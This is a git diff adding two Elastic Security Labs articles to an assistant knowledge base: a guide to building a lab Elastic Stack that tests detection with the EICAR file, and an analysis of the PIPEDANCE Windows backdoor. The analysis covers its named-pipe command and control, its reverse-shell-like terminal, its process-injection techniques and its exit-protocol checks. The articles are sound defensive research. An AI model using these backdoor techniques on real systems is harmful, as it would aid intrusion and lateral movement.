+**git clone https://github.com/peasead/elastic-container.git**
+**cd elastic-container**
+```
+
+This repository includes everything needed to stand up the Elastic Stack containers using a single shell script.
+
+### Setting credentials
+
+Before proceeding, ensure you update the credentials for the Elastic and Kibana accounts in the **.env** file located in the root directory of the repository from their defaults of **changeme**.
+
+### The shell script
+
+As mentioned above, the project includes a shell script that will simplify the management of the containers.
+
+```
+**usage: ./elastic-container.sh [-v] (stage|start|stop|restart|status|help)**
+**actions:**
+ **stage downloads all necessary images to local storage**
+ **start creates network and starts containers**
+ **stop stops running containers without removing them**
+ **destroy stops and removes the containers, the network and volumes created**
+ **restart simply restarts all the stack containers**
+ **status check the status of the stack containers**
+ **help print this message**
+ **flags:**
+ **-v enable verbose output**
+```
+
+#### Stage
+
+This option downloads all of the containers from the Elastic Docker hub. This is useful if you are going to be building the project on a system that does not always have Internet access. This is not required, you can skip this option and move directly to the start option, which will download the containers.
+
+```
+**$ ./elastic-container.sh stage**
+**8.3.0: Pulling from elasticsearch/elasticsearch**
+**7aabcb84784a: Already exists**
+**e3f44495617d: Downloading [====\\>] 916.5kB/11.26MB**
+**52008db3f842: Download complete**
+**551b59c59fdc: Downloading [\\>] 527.4kB/366.9MB**
+**25ee26aa662e: Download complete**
+**7a85d02d9264: Download complete**
+**…**
+```
+
+#### Start
+
+This opinion will create the container network, download all of the required containers, set up the TLS certificates, and start and connect Elasticsearch, Kibana, and the Fleet server containers together. This option is a “quick start” to get the Elastic Stack up and running. If you have not changed your credentials in the .env file from the defaults, the script will exit.
+
+```
+**$ ./elastic-container.sh start**
+
+**Starting Elastic Stack network and containers**
+**[+] Running 7/8**
+ **⠿ Network elastic-container\_default Created 0.0s**
+ **⠿ Volume "elastic-container\_certs" Created 0.0s**
+ **⠿ Volume "elastic-container\_esdata01" Created 0.0s**
+ **⠿ Volume "elastic-container\_kibanadata" Created 0.0s**
+ **⠿ Container elasticsearch-security-setup Waiting 2.0s**
+ **⠿ Container elasticsearch Created 0.0s**
+**…**
+```
+
+#### Stop
+
+This option will stop all running containers in the project, but will not remove them.
+
+```
+**$ ./elastic-container.sh stop**
+
+**Stopping running containers.**
+**[+] Running 4/4**
+ **⠿ Container elastic-agent Stopped 0.0s**
+ **⠿ Container kibana Stopped 0.0s**
+ **⠿ Container elasticsearch Stopped 0.0s**
+ **⠿ Container elasticsearch-security-setup Stopped**
+**…**
+```
+
+#### Destroy
+
+This option will stop all running containers in the project, remove the container network, remove all data volumes, and remove all containers.
+
+```
+**$ ./elastic-container.sh destroy**
+
+**#####**
+**Stopping and removing the containers, network, and volumes created.**
+**#####**
+**[+] Running 8/4**
+ **⠿ Container elastic-agent Removed 0.0s**
+ **⠿ Container kibana Removed 0.0s**
+ **⠿ Container elasticsearch Removed 0.0s**
+ **⠿ Container elasticsearch-security-setup Removed 0.3s**
+ **⠿ Volume elastic-container\_esdata01 Removed 0.0s**
+ **⠿ Network elastic-container\_default Removed 0.1s**
+**…**
+```
+
+#### Restart
+
+This option restarts all of the project containers.
+
+```
+**$ ./elastic-container.sh restart
+
+#####
+Restarting all Elastic Stack components.
+#####
+Name Command State Ports
+---------------------------
+elasticsearch /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:9200-\\>9200/tcp, 9300/tcp
+fleet-server /usr/bin/tini -- /usr/loca ... Up 0.0.0.0:8220-\\>8220/tcp
+kibana /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:5601-\\>5601/tcp**
+```
+
+#### Status
+
+This option returns the status of the project containers.
+
+```
+**$ ./elastic-container.sh status**
+**Name Command State Ports**
+**---------------------------**
+**elasticsearch /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:9200-\\>9200/tcp, 9300/tcp**
+**fleet-server /usr/bin/tini -- /usr/loca ... Up 0.0.0.0:8220-\\>8220/tcp**
+**kibana /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:5601-\\>5601/tcp**
+```
+
+#### Clear
+
+This option clears all documents in the logs and metrics indices.
+
+```
+**$ ./elastic-container.sh clear**
+
+**Successfully cleared logs data stream**
+**Successfully cleared metrics data stream**
+```
+
+#### Help
+
+This option provides instructions on using the shell script.
+
+```
+**$ ./elastic-container.sh help**
+
+**usage: ./elastic-container.sh [-v] (stage|start|stop|restart|status|help)**
+**actions:**
+ **stage downloads all necessary images to local storage**
+ **start creates a container network and starts containers**
+ **stop stops running containers without removing them**
+ **destroy stops and removes the containers, the network and volumes created**
+ **restart simply restarts all the stack containers**
+ **status check the status of the stack containers**
+**clear all documents in logs and metrics indexes**
+ **help print this message**
+**flags:**
+ **-v enable verbose output**
+```
+
+## Getting Started
+
+Now that we’ve walked through the project overview and the shell script, let’s go through the process of standing up your own stack.
+
+### Updating variables
+
+All of the variables are controlled in an environment file ( **.env** ) that is at the root of the repository. The only things that you must change are the default usernames and passwords for **elastic** and **kibana**.
+
+Open the **.env** file with whatever text editor you’re most comfortable with and update the **ELASTIC_PASSWORD** and **KIBANA_PASSWORD** variables from **changeme** to something secure. If you do not update the credentials from the defaults in the **.env** file, the script will exit.
+
+If you want to change the other variables (such as the stack version), you can do so in this file.
+
+### Starting the Elastic Stack
+
+Starting the project containers is as simple as running the **elastic-container.sh** shell script with the start option.
+
+```
+**$ ./elastic-container.sh start**
+
+**Starting Elastic Stack network and containers
+[+] Running 7/8
+⠿ Network elastic-container\_default Created 0.0s
+⠿ Volume "elastic-container\_certs" Created 0.0s
+⠿ Volume "elastic-container\_esdata01" Created 0.0s
+⠿ Volume "elastic-container\_kibanadata" Created 0.0s
+⠿ Container elasticsearch-security-setup Waiting 2.0s
+⠿ Container elasticsearch Created 0.0s
+⠿ Container kibana Created 0.1s
+⠿ Container fleet-server Created 0.2s
+
+Attempting to enable the Detection Engine and Prebuilt-Detection Rules
+Kibana is up. Proceeding
+Detection engine enabled. Installing prepackaged rules.
+Prepackaged rules installed!
+Waiting 40 seconds for Fleet Server setup
+Populating Fleet Settings
+READY SET GO!
+
+Browse to https://localhost:5601
+Username: elastic
+Passphrase: you-changed-me-from-the-default-right?**
+```
+
+### Accessing the Elastic Stack
+
+Once the containers have all downloaded and started, you’ll get an output that tells you to browse to **https://localhost:5601**.
+
+**Note:** You’ll need to accept the self-signed TLS certificate.
+
+## Enabling the Platinum Features
+
+Enabling the Platinum license features are completely optional. Security features, like anti-malware, EDR, EPP, etc. are included in the Basic license. Memory, behavior, and ransomware protections are Platinum license features. If you want to change your license, we can do that with the **.env** file or from within Kibana. You can update to Elastic Platinum for 30-days.
+
+If you want to use the **.env** file so that the features are enabled when the stack is built, change **LICENSE=basic** to **LICENSE=trial** and then start the project as normal.
+
+If you prefer to use Kibana, click on the hamburger menu, and then click on Stack Management.
+
+![Access Stack Management from Kibana](/assets/images/the-elastic-container-project/image5.jpg)
+
+Click on License Management and then “Start a 30-day trial”.
+
+![Start a 30-day trial](/assets/images/the-elastic-container-project/image24.png)
+
+## Creating a Fleet policy
+
+Now that we have the entire Elastic Stack up and running, we can make a [Fleet](https://www.elastic.co/guide/en/kibana/current/fleet.html) policy. Fleet is a subroutine of an [Elastic Agent](https://www.elastic.co/elastic-agent) (which was built when we ran the **start** option in the shell script) that enables you to manage other Elastic Agents, policies, and integrations.
+
+> Fleet is managed in Kibana, the UI that allows you to interact with data stored in Elasticsearch and manage your Elastic stack. If you’re interested in learning more about Kibana, check out the [free](https://www.elastic.co/training/free#quick-starts) [training](https://www.elastic.co/training/free#how-to) [videos](https://www.elastic.co/training/free#fundamentals).
+
+Log into your Kibana instance and click on the “hamburger” menu on the top left, and navigate down to “Fleet”, under the “Management” section.
+
+![Accessing Fleet](/assets/images/the-elastic-container-project/image17.jpg)
+
+Next, click on the “Agent policies” tab and then the “Create agent policy” button.
+
+![Create agent policy](/assets/images/the-elastic-container-project/image27.png)
+
+Give your new policy a name and a description (optional). Normally, we uncheck the “Collect agent logs” and “Collect agent metrics” options because it’s additional data going to the stack that we generally don’t need for our specific use-case. If you’re doing troubleshooting or interested in what’s happening behind the scenes, this data can help you understand that.
+
+![Defining the agent policy](/assets/images/the-elastic-container-project/Agent_policies_-_Fleet_-_Elastic.jpg)
+
+Next, click on your new policy and the blue “Add integration” button.
+
+![Open the Fleet policy](/assets/images/the-elastic-container-project/image15.png)
+
+![Add integrations](/assets/images/the-elastic-container-project/image3.jpg)
+
+There are hundreds of integrations, but the ones that we’re most interested in for this blog are for Elastic Security.
+
+To install Elastic Security, simply click on the tile on the main integrations page or search for “security”.
+
+![Endpoint and Cloud Security integration](/assets/images/the-elastic-container-project/image16.png)
+
+Next, click the “Add Endpoint and Cloud Security” button to install this integration into the policy we just created.
+
+![Add Endpoint and Cloud Security](/assets/images/the-elastic-container-project/image4.jpg)
+
+Name the integration and click the blue “Save and continue” button.
+
+![Save the integration to the policy](/assets/images/the-elastic-container-project/image1.jpg)
+
+> While the Endpoint and Cloud Security and System integrations will collect security related logs, if you’re using Sysmon on a Windows host, you may want to add the “Windows” integration to collect those logs.
+
+Once the integration is installed, you’ll be prompted to add more Agents or to do that later. Select the “Add Elastic Agent later” option so we can make a few more changes to our policy.
+
+![Add Elastic Agents later](/assets/images/the-elastic-container-project/image19.jpg)
+
+Now we’ll be dropped back to our policy page.
+
+We should have two integrations for our policy: **security** and **system-1**.
+
+![Reviewing the Windows policy](/assets/images/the-elastic-container-project/Agent_policies_-_Fleet_-_Elastic.jpg)
+
+Before we add any agents, we’ll want to set our Elastic Agent to Detect (so that it allows the malware to completely execute), register the Elastic Agent as a trusted AV solution (Windows only), and instruct the Endpoint and Cloud Security integration to collect memory samples from security events. This is tremendously helpful for “fileless” malware that injects directly into memory, like Cobalt Strike.
+
+> If you want to learn more about extracting malware beacons from events generated by the Elastic Agent, check out our other [publications](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack) and [repositories](https://github.com/elastic/malware-exquacker).
+
+To allow the malware to continue to execute, on your “Windows” policy page, click on the name of the integration (“security” in our example), set the Protection level to “Detect”.
+
+![Setting the Protection level to Detect](/assets/images/the-elastic-container-project/image25.jpg)
+
+Repeat these steps for the Ransomware, Memory threat protections, and Malicious behavior sections.
+
+> We’re setting the Elastic Agent to Detect so that the malware we’re detonating will run completely so that we can analyze the entire execution chain. If you want the malware to be stopped, you can leave this in Prevent mode.
+
+Next, scroll to the bottom and select the “Register as antivirus” toggle and click on the “Show advanced settings” hyperlink.
+
+![Register as antivirus](/assets/images/the-elastic-container-project/image18.jpg)
+
+Scroll down to **windows.advanced.memory_protection.shellcode_collect_sample** , **windows.advanced.memory_protection.memory_scan_collect_sample** , and **windows.advanced.memory_protection.shellcode_enhanced_pe_parsing** options and set the value to **true**.
+
+![Enabling sample collection](/assets/images/the-elastic-container-project/image26.jpg)
+
+> As mentioned above, these steps are for labs, sandboxes, testing, etc. These settings can generate a lot of data, so setting these for production will need resourcing and sizing considerations.
+
+If you’re making a policy for Linux or macOS, repeat these for the proper OS.
+
+Once we’re done with all of the post-installation configurations, we can click the blue Save integration button.
+
+## Enabling Elastic’s Prebuilt Detection Rules
+
+Now that we have created our Fleet agent policy we need to enable the set of pre-built detection rules associated with the OS or platform we will be deploying on (e.g Windows). To do this you will need to go to the Alerts page within the security app.
+
+Click on the hamburger menu and select Alerts, under the Security solution.
+
+![Access the Alerts section](/assets/images/the-elastic-container-project/Home_-_Elastic.jpg)
+
+Next, click on the blue Manage Rules button.
+
+![Access the Manage rules interface](/assets/images/the-elastic-container-project/Alerts_-_Kibana.jpg)
+
+Once on the Rules page you can update all of the prebuilt rules provided by Elastic by clicking on the “Update Elastic prebuilt rules” button. The update framework is enabled when you go into the “Manage rules” section for the first time, if the “Update Elastic prebuilt rules” button isn’t present, refresh the screen.
+
+![Update Elastic prebuilt rules](/assets/images/the-elastic-container-project/Rules_-_Kibana.jpg)
+
+Once the rules have been updated, you can browse the available detection rules, search them by a number of different patterns or simply filter by tag, which is what we will do here by searching for Windows rules.
+
+![Filter for Windows rules](/assets/images/the-elastic-container-project/Rules_-_Kibana-2.jpg)
+
+Now we can select all of the Windows rules.
+
+![Selecting all Windows rules](/assets/images/the-elastic-container-project/Rules_-_Kibana-3.jpg)
+
+Once all of the rules have been selected, we can bulk enable them.
+
+![Bulk enable Windows rules](/assets/images/the-elastic-container-project/Rules_-_Kibana-4.jpg)
+
+> As the Elastic Container Project runs completely inside single Docker containers, performance impacts could be noticed if you enable all of the rules available. Explore the different rules and enable or disable them based on your infrastructure and use cases.
+
+After we have enabled these rules they will be live and will be run against the data your endpoint agent sends into your stack. When the Detection Engine rules are triggered, they will be raised in the Alerts page in the Security Solution.
+
+## Enrolling an Elastic Agent
+
+Still in Fleet, we have several ways to add an Elastic Agent. The most straightforward is from within the policy that we want to enroll an Elastic Agent into (otherwise you have to specify which policy you want to use). It doesn’t really matter which approach you use, but clicking on the Actions button and then Add agent works from just about anywhere in Fleet.
+
+![Adding Elastic Agent](/assets/images/the-elastic-container-project/image8.jpg)
+
+Scroll down and click on the OS that you’re going to be installing the Elastic Agent on, and copy/paste the instructions directly into a terminal window on the host you’re going to be installing the agent onto. Note, if you’re using Windows, use a Powershell CLI that is running as (or elevated to) an account with administrative entitlements.
+
+![Powershell commands to add an Elastic Agent](/assets/images/the-elastic-container-project/image22.png)
+
+Of note, because all of our TLS certificates are self-signed, we need to append the **–insecure** flag. This is unnecessary if you are using trusted certificates.
+
+```
+**.\elastic-agent.exe install --url=https://[stack-ip]:8220 --enrollment-token=[token] --insecure**
+```
+
+![Enrolling the Elastic Agent into Fleet](/assets/images/the-elastic-container-project/image23.jpg)
+
+Back in Kibana, we can see confirmation that the Elastic Agent installed on the host and that data is being recorded into Elasticsearch.
+
+![Verifying Elastic Agent enrollment](/assets/images/the-elastic-container-project/image2.jpg)
+
+We can see that the Elastic Agent is reporting into Fleet and is healthy.
+
+![Verify Elastic Agent health](/assets/images/the-elastic-container-project/image28.png)
+
+If we go into the Discover tab, we can see various event types reporting into Elasticsearch. We can generate some test data by opening **notepad.exe** , **calc.exe** , and **ping.exe -t www.elastic.co** on the host. From Discover, we can make a simple query to validate that we’re seeing the data:
+
+```
+**process.name.caseless : (notepad.exe or ping.exe or calc.exe)**
+```
+
+![Verifying data is being sent to Elasticsearch](/assets/images/the-elastic-container-project/image7.png)
+
+Now that we’ve validated that we’re seeing data. Let's fire some malware!
+
+## Test fire some malware
+
+There are a lot of places you can download malware from, but for this test, we’ll simply use the industry standard [EICAR anti malware test file](https://www.eicar.org/download-anti-malware-testfile/) to check the functionality.
+
+The EICAR test is a file that is universally identified by security vendors and is used to test the operation of anti malware software and platforms. It contains a single string and is non-malicious.
+
+From within the Windows host, we’ll use Powershell to download the EICAR file.
+
+```
+**Invoke-WebRequest -Uri "https://secure.eicar.org/eicar.com.txt" -OutFile "eicar.txt"**
+```
+
+As expected, the event was immediately identified by the Elastic Agent’s security integration.
+
+![Elastic Security detected the EICAR test file](/assets/images/the-elastic-container-project/image29.jpg)
+
+After a few minutes, the events are recorded into the Security Solution within Kibana. You can get there by clicking on the hamburger menu and then clicking on the Alerts section.
+
+![Viewing Security alerts](/assets/images/the-elastic-container-project/image9.jpg)
+
+Here we can see the alert populated.
+
+![Alert in the Security Solution](/assets/images/the-elastic-container-project/image11.png)
+
+If we click on the Analyzer button, we can dig into the event to identify the process that generated the event.
+
+![Analyzer button](/assets/images/the-elastic-container-project/image12.jpg)
+
+In our example, we can see **powershell.exe** generated the event and this includes the correlated network events - **secure.eicar.org** , which is where the EICAR test file was downloaded from.
+
+![Analyzer view](/assets/images/the-elastic-container-project/image13.jpg)
+
+## Summary
+
+In this publication, we introduced you to the Elastic Stack and an open source project that can be used to quickly and securely stand up the entire stack for testing, labs, and security research.
+
+Kibana and the Security Solution are powerful tools that are built by incident responders, threat hunters, and intelligence analysts with security practitioners in mind. To learn more about how to use these tools, [Elastic has some great (free and paid) training](https://www.elastic.co/training/) that can help learn how to use Kibana for threat hunting.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/twice_around_the_dance_floor_with_pipedance.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/twice_around_the_dance_floor_with_pipedance.md
new file mode 100644
index 0000000000000..4775edad80247
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/twice_around_the_dance_floor_with_pipedance.md
@@ -0,0 +1,322 @@
+---
+title: "Twice around the dance floor - Elastic discovers the PIPEDANCE backdoor"
+slug: "twice-around-the-dance-floor-with-pipedance"
+date: "2023-02-27"
+subtitle: "Elastic Security Labs describes the PIPEDANCE backdoor"
+description: "Elastic Security Labs is tracking an active intrusion into a Vietnamese organization using a recently discovered triggerable, multi-hop backdoor we are calling PIPEDANCE. This full-featured malware enables stealthy operations through the use of named"
+author:
+  - slug: daniel-stepanic
+image: "photo-edited-12@2x.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - ref1326
+  - pipedance
+---
+
+## Key takeaways
+
+- Elastic Security Labs has identified PIPEDANCE, a previously unknown Windows backdoor used to enable post-compromise and lateral movement activities
+- Built for stealthy operations through named pipes, PIPEDANCE employs capabilities for interactive terminals, discovery/file enumeration, process injection, and data exfiltration checks
+- PIPEDANCE was observed deploying Cobalt Strike
+
+## Preamble
+
+In late December 2022, Elastic Security Labs observed new activity in a previously monitored environment targeting a Vietnamese organization. This new activity included the execution of a named pipe malware used to facilitate post-compromise activity. We are naming this malware family PIPEDANCE. By leveraging PIPEDANCE, the adversary is able to:
+
+- Disguise activity through a custom function that randomly injects into a hard-coded list of Windows programs
+- Perform discovery by enumerating files and processes
+- Leverage standard backdoor capabilities such as running commands, writing files
+- Check different network protocols for exfiltration
+- Launch additional payloads through process injection techniques
+
+In this post, we walk through the initial execution then detail the capabilities we have discovered from reviewing the malware.
+
+Note: Check out our follow-on publication on creating your own client to interact with a PIPEDANCE infected endpoint [here](https://www.elastic.co/security-labs/dancing-the-night-away-with-named-pipes).
+
+## Overview
+
+Unlike malware that might communicate with conventional network or application protocols, we identified a binary designed explicitly for lateral movement and post-compromise enablement within a contested environment: executing additional implants, running commands, performing file discovery, enumerating running processes, and checking outbound access; all through the use of Windows named pipes. This kind of functionality is comparable to Cobalt Strike or Metasploit’s SMB modules.
+
+> [Named pipes](https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes) within Windows allow for inter-process communication on a single computer or between processes on separate machines within the same network. Named pipes can be set up for one-way or two-way communication between a pipe client and a pipe server. The data used within named pipes are all stored in memory where it is written and retrieved using standard Windows APIs ( **CreateFile** / **WriteFile** / **ReadFile** ) in the same way as reading/writing files.
+
+[Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) was installed after an unknown initial compromise. The [Suspicious Windows Service Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_suspicious_windows_service_execution.toml) behavioral rule generated the first observed events. While unconfirmed, [published research](https://www.microsoft.com/en-us/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/) describes similar techniques by an adversary leveraging execution through a locally-mounted Administrator share and using [Microsoft’s SysInternals DebugView](https://learn.microsoft.com/en-us/sysinternals/downloads/debugview) ( **DbgView.exe** ) utility to load PIPEDANCE.
+
+**DbgView.exe** was observed loading PIPEDANCE into [**makecab.exe**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/makecab), the Windows utility used to package Cabinet files **.** The Windows performance data utility, [**typeperf.exe**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/typeperf), was then injected into and spawned [**openfiles.exe**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/openfiles) where Cobalt Strike was loaded into this process.
+
+While **openfiles.exe** binary is a legitimate Microsoft application, Elastic Defend generated a Cobalt Strike memory signature. After extracting the memory regions from the alert in Kibana, we identified the Cobalt Strike module [**invokeassembly.x64.dll**](https://twitter.com/_RastaMouse/status/1104282852869525506?s=20&t=0_v846VUU-A0lE2gxgN_bg), validating that Cobalt Strike was injected into the legitimate **openfiles.exe** binary.
+
+![Execution flow of DgbView.exe loading makecab.exe and then openfiles.exe (Cobalt Strike)](/assets/images/twice-around-the-dance-floor-with-pipedance/image19.png)
+
+PIPEDANCE leverages named pipes as a communication mechanism between different infected endpoints within a compromised network. The adversary uses this capability as a bidirectional layer of command and control through which they can dispatch commands and pass data between named pipes.
+
+## Initial set-up / Communication flow
+
+At the beginning of the main function, there is a hardcoded string used as the pipe name. This string is also used in later stages as an RC4 key to encrypt/decrypt data between pipes. In the image below, we can see the hardcoded pipe name ( **u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe** ) being set as a global variable.
+
+![The hardcoded u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe string used as the pipe name](/assets/images/twice-around-the-dance-floor-with-pipedance/image27.jpg)
+
+During initial execution, the malware will use the **CreateNamedPipeA** and **ConnectNamedPipe** methods to create the named pipe ( **“\\.\pipe\u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe**") and wait for an incoming client process to connect to the pipe. The figure below represents this activity showing the pipe name being formatted with hardcoded string and initializing the pipe.
+
+![Initial Pipe Creation and Setup](/assets/images/twice-around-the-dance-floor-with-pipedance/image17.jpg)
+
+During the first client connection, PIPEDANCE retrieves the following values from the local system and places them into a buffer:
+
+- Process ID of the PIPEDANCE process
+- Current working directory of the PIPEDANCE process.
+- Domain & Username of the PIPEDANCE process
+
+PIPEDANCE passes this buffer and an 8-byte structure containing the result flag from a **IsWow64Process** evaluation and the buffer size for the subsequent **WriteFile** operation to the pipe. PIPEDANCE then encrypts the buffer containing the previous process details with RC4 and then writes the encrypted data back to the client pipe.
+
+![PIPEDANCE Write File Operation](/assets/images/twice-around-the-dance-floor-with-pipedance/image18.jpg)
+
+Below is a high-level graphic that illustrates the purpose-built lateral movement functionality. With PIPEDANCE infections, the named pipe server process is run on a new victim machine, while the client instructions come from the operator from a previously compromised machine in the same network.
+
+![PIPEDANCE communication flow](/assets/images/twice-around-the-dance-floor-with-pipedance/image19_2_V2.jpg)
+
+### Command dispatching
+
+After an initial handshake, PIPEDANCE’s primary functionality consists of a while loop with a command dispatching function. This dispatching function will retrieve the provided command ID of its respective function along with any arguments and their size from the operator.
+
+![PIPEDANCE dispatching function](/assets/images/twice-around-the-dance-floor-with-pipedance/image23.jpg)
+
+The parsing function passes an 8-byte structure consisting of the command instruction and the buffer size for the command argument. The command argument is decrypted using the previous RC4 key, then written back to the pipe.
+
+![PIPEDANCE parsing function](/assets/images/twice-around-the-dance-floor-with-pipedance/image20.jpg)
+
+Once the command ID has been received, PIPEDANCE performs several conditional checks using if/else and switch statements.
+
+![PIPEDANCE conditional checks](/assets/images/twice-around-the-dance-floor-with-pipedance/image24.jpg)
+
+The majority of the command functions return a result flag or error code to the operator. For some functions that may return large amounts of data, such as a list of running processes, the malware generates a new named pipe using the hardcoded string described earlier. Then it concatenates the PID of the PIPEDANCE process which sends and receives the data over this pipe.
+
+![PIPEDANCE sending large datasets over a new named pipe](/assets/images/twice-around-the-dance-floor-with-pipedance/image9.jpg)
+
+## Command functionality
+
+PIPEDANCE supports more than 20 different functions, each accessed using their command ID via if/then and switch/case logic. Below is an example of the first 4 functions.
+
+![Sample of PIPEDANCE functions](/assets/images/twice-around-the-dance-floor-with-pipedance/image26.jpg)
+
+### Command handling table
+
+| Command ID | Description                                                                                          |
+| ---------- | ---------------------------------------------------------------------------------------------------- |
+| 0x1        | Terminates process based on provided PID                                                             |
+| 0x2        | Run a single command through cmd.exe, returns output                                                 |
+| 0x3        | Terminal shell using stdin/stdout redirection through named pipes                                    |
+| 0x4        | File enumeration on current working directory                                                        |
+| 0x6        | Create a new file with content from pipe                                                             |
+| 0x7        | Retrieve current working directory                                                                   |
+| 0x8        | Set current working directory                                                                        |
+| 0x9        | Get running processes                                                                                |
+| 0x16       | Perform injection (thread hijacking or Heaven’s Gate) with stdin/stdout option for the child process |
+| 0x18       | Perform injection from hardcoded list (thread hijacking or Heaven’s Gate)                            |
+| 0x1A       | Perform injection on provided PID (thread hijacking or Heaven’s Gate)                                |
+| 0x3E       | Clear out global variable/pipe data                                                                  |
+| 0x47       | Connectivity check via HTTP Get Request                                                              |
+| 0x48       | Connectivity check via DNS with providing DNS Server IP                                              |
+| 0x49       | Connectivity check via ICMP                                                                          |
+| 0x4A       | Connectivity check via TCP                                                                           |
+| 0x4B       | Connectivity check via DNS without providing DNS Server IP                                           |
+| 0x63       | Disconnect pipe, close handle, exit thread                                                           |
+| 0x64       | Disconnect pipe, close handle, exit process, exit thread                                             |
+
+In order to detail the significant capabilities of PIPEDANCE, we’ve split our analysis into three sections:
+
+- Standard backdoor functionality
+- Network connectivity checks
+- Process Injection techniques
+
+### Backdoor functionality
+
+PIPEDANCE offers various interactive backdoor capabilities needed by an operator in order to perform reconnaissance, and pivot through different systems.
+
+#### Command execution
+
+There are two functions related to command execution, **Function 0x2** and **0x3**. The first method ( **Function 0x2** ) accepts a command argument from the terminal, such as **ipconfig**. This function starts by creating an anonymous named pipe with read and write handles. Before creating the process, PIPEDANCE will configure the **STARTUPINFO** structure using **STARTF_USESTDHANDLES** to pipe the command output ( **hStdOutput** ) for the new process.
+
+![Configuring the STARTUPINFO structure](/assets/images/twice-around-the-dance-floor-with-pipedance/image22.jpg)
+
+A thread is then created passing the previous read pipe handle as an argument. Memory is allocated for the command output and read from this read pipe handle. The data is then looped over and encrypted in a similar manner as before and sent back through a new named pipe. In our example, this is the data from the **ipconfig** command.
+
+![PIPEDANCE reading in the command output](/assets/images/twice-around-the-dance-floor-with-pipedance/image12.jpg)
+
+The second execution command ( **Function 0x3** ) creates a new **cmd.exe** process in a suspended state and also leverages **STARTF_USESTDHANDLES** as before.
+
+![PIPEDANCE sets up cmd.exe execution through STDIN/STDOUT](/assets/images/twice-around-the-dance-floor-with-pipedance/image25.jpg)
+
+After the process is created, a new thread is created passing the **STARTUPINFO** where two named pipe server processes are created for input and output and the thread is resumed.
+
+![PIPEDANCE processing STDIN/STDOUT for command execution](/assets/images/twice-around-the-dance-floor-with-pipedance/image15.jpg)
+
+This functionality operates similarly to a reverse shell, where the attacker has the ability to directly interact and pass data back and forth.
+
+#### Discovery and enumeration
+
+PIPEDANCE has built-in functionality related to discovery and enumeration. For process enumeration ( **Function 0x9** ), it leverages the **CreateToolhelp32Snapshot** function to retrieve the process details. The function returns the process ID, the name of the process, the architecture of the process, whether a process is tied to a system (Session represented as a **0** ) or user session (Session represented as a **1** ), and the username associated with the process.
+
+![PIPEDANCE performing process enumeration](/assets/images/twice-around-the-dance-floor-with-pipedance/image3.jpg)
+
+Interestingly, in our observations with a few different modules, the results are mangled by the developer due to formatting the data with the C runtime library function **vsprintf_s** when working with Unicode data. This can be observed below in the process discovery module where the process name output gets mangled whereas PIPEDANCE only returns the first character of the process, architecture, and usernames. Below is the output table returned to the operator. In this example, PID **564** with a (mangled) “Name” of **w** is actually PID **564** with a full process name of **winlogon.exe** , a full architecture name of **x86** , a session ID of **1** , and a full user name of **NT AUTHORITY\SYSTEM** , etc.
+
+![Table of PIPEDANCE's enumeration output](/assets/images/twice-around-the-dance-floor-with-pipedance/pipedance-table.jpg)
+
+PIPEDANCE implements a terminal-like concept where it has a current or working directory for its process. This enables the adversary to use functions directly tied to the working directory, such as the file enumeration modules.
+
+For file enumeration, PIPEDANCE will use a wildcard to pull back a file listing from the current working directory.
+
+![PIPEDANCE performs file and directory enumeration](/assets/images/twice-around-the-dance-floor-with-pipedance/image14.jpg)
+
+PIPEDANCE also offers functionality for creating files and writing content to files on the victim machine ( **Function 0x6** ). It does this by first creating and naming a file on the victim machine, then it creates a new thread with a new instance of a named pipe that will then wait for and read incoming data over the pipe. This data is XOR’d with the previous RC4 key and then written to the file.
+
+![PIPEDANCE creates and writes a file on the victim machine](/assets/images/twice-around-the-dance-floor-with-pipedance/image6.jpg)
+
+PIPEDANCE also has various administrator or maintenance commands used to terminate processes, terminate threads, disconnect pipes, clear global variables from memory, etc.
+
+### Network connectivity checks
+
+As adversaries pivot and move through a network, one of their objectives is understanding where the endpoint sits inside the network and determining what protocols are available for shipping data laterally or externally. PIPEDANCE is specifically built to identify exit points on an endpoint by checking DNS, ICMP, TCP, and HTTP protocols.
+
+![PIPEDANCE performing protocol connectivity checks](/assets/images/twice-around-the-dance-floor-with-pipedance/image5.jpg)
+
+As an example, PIPEDANCE will make a DNS request to bing[.]com when providing a DNS server as an argument, the result of the query will be returned back to the operator indicating success or not. For ICMP, PIPEDANCE will generate fake data for the ICMP request by looping over the alphabet and sending it to a provided IP address.
+
+![PIPEDANCE performing ICMP checks](/assets/images/twice-around-the-dance-floor-with-pipedance/image10.jpg)
+
+![PIPEDANCE generating ICMP data from the US alphabet](/assets/images/twice-around-the-dance-floor-with-pipedance/image7.jpg)
+
+Similarly for HTTP, the operator can provide a domain where PIPEDANCE will perform a vanilla HTTP GET request over port 80 and then return a boolean value for success or not.
+
+![PIPEDANCE performing an HTTP check](/assets/images/twice-around-the-dance-floor-with-pipedance/image4.jpg)
+
+These are straightforward functions, but they provide great insight into the developer’s mindset and the type of objectives they are trying to achieve. These checks are likely used in a multi-stage process where these protocols are verified first in a lightweight method then additional shellcode/payloads are launched afterward.
+
+### Process injection techniques
+
+In a similar fashion to many post-exploitation frameworks, PIPEDANCE leverages different forms of process injection to execute shellcode and launch additional implants. Depending on the process architecture, the malware will perform injection using a standard thread execution hijacking technique or the [Heaven’s Gate technique](https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/).
+
+![PIPEDANCE performing process injection](/assets/images/twice-around-the-dance-floor-with-pipedance/image16.jpg)
+
+PIPEDANCE utilizes defense evasions to obscure their activity by randomly picking a Windows program from a hardcoded list to use as an injection target.
